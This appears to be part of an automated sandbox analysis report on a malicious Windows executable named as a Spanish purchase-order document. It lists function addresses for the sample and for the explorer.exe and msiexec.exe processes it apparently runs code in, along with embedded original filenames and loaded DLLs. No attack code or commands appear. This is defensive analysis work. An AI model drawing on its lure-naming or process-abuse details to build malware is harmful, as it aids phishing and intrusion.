Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_00402D90	6_2_00402D90
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_00409E4C	6_2_00409E4C
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_00409E50	6_2_00409E50
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0041D770	6_2_0041D770
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_00402FB0	6_2_00402FB0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016F8158	6_2_016F8158
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01660100	6_2_01660100
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0170A118	6_2_0170A118
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_017281CC	6_2_017281CC
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_017301AA	6_2_017301AA
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01702000	6_2_01702000
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0172A352	6_2_0172A352
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_017303E6	6_2_017303E6
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0167E3F0	6_2_0167E3F0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01710274	6_2_01710274
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016F02C0	6_2_016F02C0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01670535	6_2_01670535
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01730591	6_2_01730591
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01722446	6_2_01722446
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01714420	6_2_01714420
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0171E4F6	6_2_0171E4F6
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01670770	6_2_01670770
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01694750	6_2_01694750
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0166C7C0	6_2_0166C7C0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0168C6E0	6_2_0168C6E0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01686962	6_2_01686962
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016729A0	6_2_016729A0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0173A9A6	6_2_0173A9A6
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01672840	6_2_01672840
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0167A840	6_2_0167A840
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0169E8F0	6_2_0169E8F0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016568B8	6_2_016568B8
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0172AB40	6_2_0172AB40
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01726BD7	6_2_01726BD7
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0166EA80	6_2_0166EA80
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0167AD00	6_2_0167AD00
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0170CD1F	6_2_0170CD1F
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0166ADE0	6_2_0166ADE0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01688DBF	6_2_01688DBF
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01670C00	6_2_01670C00
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01660CF2	6_2_01660CF2
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01710CB5	6_2_01710CB5
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E4F40	6_2_016E4F40
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01712F30	6_2_01712F30
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016B2F28	6_2_016B2F28
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01690F30	6_2_01690F30
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0167CFE0	6_2_0167CFE0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01662FC8	6_2_01662FC8
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016EEFA0	6_2_016EEFA0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01670E59	6_2_01670E59
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0172EE26	6_2_0172EE26
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0172EEDB	6_2_0172EEDB
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0172CE93	6_2_0172CE93
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01682E90	6_2_01682E90
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016A516C	6_2_016A516C
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0165F172	6_2_0165F172
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0173B16B	6_2_0173B16B
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0167B1B0	6_2_0167B1B0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0172F0E0	6_2_0172F0E0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_017270E9	6_2_017270E9
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016770C0	6_2_016770C0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0171F0CC	6_2_0171F0CC
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0165D34C	6_2_0165D34C
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0172132D	6_2_0172132D
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016B739A	6_2_016B739A
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_017112ED	6_2_017112ED
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0168B2C0	6_2_0168B2C0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016752A0	6_2_016752A0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01727571	6_2_01727571
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0170D5B0	6_2_0170D5B0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01661460	6_2_01661460
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0172F43F	6_2_0172F43F
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0172F7B0	6_2_0172F7B0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_017216CC	6_2_017216CC
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01679950	6_2_01679950
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0168B950	6_2_0168B950
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01705910	6_2_01705910
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016DD800	6_2_016DD800
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016738E0	6_2_016738E0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0172FB76	6_2_0172FB76
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016ADBF9	6_2_016ADBF9
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E5BF0	6_2_016E5BF0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0168FB80	6_2_0168FB80
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E3A6C	6_2_016E3A6C
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01727A46	6_2_01727A46
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0172FA49	6_2_0172FA49
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0171DAC6	6_2_0171DAC6
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016B5AA0	6_2_016B5AA0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01711AA3	6_2_01711AA3
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0170DAAC	6_2_0170DAAC
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01727D73	6_2_01727D73
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01673D40	6_2_01673D40
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01721D5A	6_2_01721D5A
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0168FDC0	6_2_0168FDC0
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_016E9C32	6_2_016E9C32
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0172FCF2	6_2_0172FCF2
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0172FF09	6_2_0172FF09
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01633FD2	6_2_01633FD2
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01633FD5	6_2_01633FD5
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_0172FFB1	6_2_0172FFB1
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01671F92	6_2_01671F92
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: 6_2_01679EB0	6_2_01679EB0
Source: C:\Windows\explorer.exe	Code function: 7_2_08687232	7_2_08687232
Source: C:\Windows\explorer.exe	Code function: 7_2_08686036	7_2_08686036
Source: C:\Windows\explorer.exe	Code function: 7_2_0867D082	7_2_0867D082
Source: C:\Windows\explorer.exe	Code function: 7_2_08681B30	7_2_08681B30
Source: C:\Windows\explorer.exe	Code function: 7_2_08681B32	7_2_08681B32
Source: C:\Windows\explorer.exe	Code function: 7_2_0867ED02	7_2_0867ED02
Source: C:\Windows\explorer.exe	Code function: 7_2_08684912	7_2_08684912
Source: C:\Windows\explorer.exe	Code function: 7_2_0868A5CD	7_2_0868A5CD
Source: C:\Windows\explorer.exe	Code function: 7_2_0E5C0232	7_2_0E5C0232
Source: C:\Windows\explorer.exe	Code function: 7_2_0E5BAB32	7_2_0E5BAB32
Source: C:\Windows\explorer.exe	Code function: 7_2_0E5BAB30	7_2_0E5BAB30
Source: C:\Windows\explorer.exe	Code function: 7_2_0E5BF036	7_2_0E5BF036
Source: C:\Windows\explorer.exe	Code function: 7_2_0E5B6082	7_2_0E5B6082
Source: C:\Windows\explorer.exe	Code function: 7_2_0E5BD912	7_2_0E5BD912
Source: C:\Windows\explorer.exe	Code function: 7_2_0E5B7D02	7_2_0E5B7D02
Source: C:\Windows\explorer.exe	Code function: 7_2_0E5C35CD	7_2_0E5C35CD
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D7E4F6	8_2_04D7E4F6
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D82446	8_2_04D82446
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D74420	8_2_04D74420
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D90591	8_2_04D90591
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CD0535	8_2_04CD0535
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CEC6E0	8_2_04CEC6E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CCC7C0	8_2_04CCC7C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CF4750	8_2_04CF4750
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CD0770	8_2_04CD0770
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D62000	8_2_04D62000
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D881CC	8_2_04D881CC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D901AA	8_2_04D901AA
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D841A2	8_2_04D841A2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D58158	8_2_04D58158
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CC0100	8_2_04CC0100
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D6A118	8_2_04D6A118
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D502C0	8_2_04D502C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D70274	8_2_04D70274
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CDE3F0	8_2_04CDE3F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D903E6	8_2_04D903E6
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D8A352	8_2_04D8A352
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CC0CF2	8_2_04CC0CF2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D70CB5	8_2_04D70CB5
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CD0C00	8_2_04CD0C00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CCADE0	8_2_04CCADE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CE8DBF	8_2_04CE8DBF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D6CD1F	8_2_04D6CD1F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CDAD00	8_2_04CDAD00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D8EEDB	8_2_04D8EEDB
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D8CE93	8_2_04D8CE93
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CE2E90	8_2_04CE2E90
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CD0E59	8_2_04CD0E59
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D8EE26	8_2_04D8EE26
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CC2FC8	8_2_04CC2FC8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CDCFE0	8_2_04CDCFE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D4EFA0	8_2_04D4EFA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D44F40	8_2_04D44F40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D72F30	8_2_04D72F30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D12F28	8_2_04D12F28
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CF0F30	8_2_04CF0F30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CFE8F0	8_2_04CFE8F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CB68B8	8_2_04CB68B8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CD2840	8_2_04CD2840
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CDA840	8_2_04CDA840
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CD29A0	8_2_04CD29A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D9A9A6	8_2_04D9A9A6
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CE6962	8_2_04CE6962
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CCEA80	8_2_04CCEA80
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D86BD7	8_2_04D86BD7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D8AB40	8_2_04D8AB40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CC1460	8_2_04CC1460
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D8F43F	8_2_04D8F43F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D6D5B0	8_2_04D6D5B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D87571	8_2_04D87571
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D816CC	8_2_04D816CC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D8F7B0	8_2_04D8F7B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CD70C0	8_2_04CD70C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D7F0CC	8_2_04D7F0CC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D870E9	8_2_04D870E9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D8F0E0	8_2_04D8F0E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CDB1B0	8_2_04CDB1B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D9B16B	8_2_04D9B16B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CBF172	8_2_04CBF172
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D0516C	8_2_04D0516C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CEB2C0	8_2_04CEB2C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D712ED	8_2_04D712ED
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CD52A0	8_2_04CD52A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D1739A	8_2_04D1739A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CBD34C	8_2_04CBD34C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D8132D	8_2_04D8132D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D8FCF2	8_2_04D8FCF2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D49C32	8_2_04D49C32
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CEFDC0	8_2_04CEFDC0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D81D5A	8_2_04D81D5A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CD3D40	8_2_04CD3D40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D87D73	8_2_04D87D73
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CD9EB0	8_2_04CD9EB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CD1F92	8_2_04CD1F92
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D8FFB1	8_2_04D8FFB1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D8FF09	8_2_04D8FF09
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CD38E0	8_2_04CD38E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D3D800	8_2_04D3D800
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CD9950	8_2_04CD9950
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CEB950	8_2_04CEB950
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D65910	8_2_04D65910
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D7DAC6	8_2_04D7DAC6
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D15AA0	8_2_04D15AA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D71AA3	8_2_04D71AA3
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D6DAAC	8_2_04D6DAAC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D8FA49	8_2_04D8FA49
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D87A46	8_2_04D87A46
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D43A6C	8_2_04D43A6C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D45BF0	8_2_04D45BF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D0DBF9	8_2_04D0DBF9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04CEFB80	8_2_04CEFB80
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_04D8FB76	8_2_04D8FB76
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_00BAE84B	8_2_00BAE84B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_00BAEB6E	8_2_00BAEB6E
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_00B92D90	8_2_00B92D90
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_00B92D87	8_2_00B92D87
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_00B92FB0	8_2_00B92FB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_00B99E50	8_2_00B99E50
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 8_2_00B99E4C	8_2_00B99E4C

Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: String function: 016EF290 appears 105 times
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: String function: 016B7E54 appears 102 times
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: String function: 016DEA12 appears 86 times
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: String function: 016A5130 appears 58 times
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Code function: String function: 0165B970 appears 277 times
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: String function: 04CBB970 appears 277 times
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: String function: 04D17E54 appears 102 times
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: String function: 04D4F290 appears 105 times
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: String function: 04D3EA12 appears 86 times
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: String function: 04D05130 appears 58 times

Source: Solicitud de pedido Documento No 168646080.exe, 00000002.00000002.1393720421.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Solicitud de pedido Documento No 168646080.exe
Source: Solicitud de pedido Documento No 168646080.exe, 00000002.00000002.1401360889.0000000006F2E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs Solicitud de pedido Documento No 168646080.exe
Source: Solicitud de pedido Documento No 168646080.exe, 00000002.00000002.1402972690.000000000DFB0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Solicitud de pedido Documento No 168646080.exe
Source: Solicitud de pedido Documento No 168646080.exe, 00000002.00000000.1318677618.00000000003F2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameqEnw.exe( vs Solicitud de pedido Documento No 168646080.exe
Source: Solicitud de pedido Documento No 168646080.exe, 00000002.00000002.1397158259.0000000004104000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Solicitud de pedido Documento No 168646080.exe
Source: Solicitud de pedido Documento No 168646080.exe, 00000006.00000002.1450866073.000000000175D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Solicitud de pedido Documento No 168646080.exe
Source: Solicitud de pedido Documento No 168646080.exe, 00000006.00000002.1450776254.000000000159F000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamemsiexec.exeX vs Solicitud de pedido Documento No 168646080.exe
Source: Solicitud de pedido Documento No 168646080.exe, 00000006.00000002.1450474495.00000000011D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsiexec.exeX vs Solicitud de pedido Documento No 168646080.exe
Source: Solicitud de pedido Documento No 168646080.exe, 00000006.00000002.1450474495.0000000001202000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsiexec.exeX vs Solicitud de pedido Documento No 168646080.exe
Source: Solicitud de pedido Documento No 168646080.exe	Binary or memory string: OriginalFilenameqEnw.exe( vs Solicitud de pedido Documento No 168646080.exe

Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe	Section loaded: msasn1.dll	Jump to behavior
